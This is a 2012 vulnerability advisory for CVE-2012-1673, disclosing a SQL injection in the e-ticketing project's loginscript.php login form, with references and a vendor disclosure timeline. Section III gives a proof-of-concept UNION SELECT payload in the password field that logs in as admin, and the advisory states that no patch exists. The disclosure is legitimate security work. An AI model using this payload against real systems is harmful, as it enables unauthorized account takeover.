e-ticketing' SQL Injection

e-ticketing’ SQL Injection

I. DESCRIPTION

A vulnerability exists in loginscript.php that allows for SQL injection of the ‘user_name’ and ‘password’ POST parameters.

—————————————

II. TESTED VERSION

Released on 2011-11-30 (no versioning used)

—————————————

III. PoC EXPLOIT

POST a form to loginscript.php with the value of ‘password’ set to: ‘

UNION SELECT * from user where user_name = ‘admin

—————————————

IV. SOLUTION

Do not use this software, no patched version exists at this time.

—————————————

V. REFERENCES

http://sourceforge.net/projects/e-ticketing/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1673

—————————————

VI. TIMELINE

03/01/2012 – Initial vendor disclosure

03/03/2012 – Vendor response and commitment to fix

03/20/2012 – Follow-up e-mail to vendor as no patched version was published yet

04/04/2012 – Public disclosure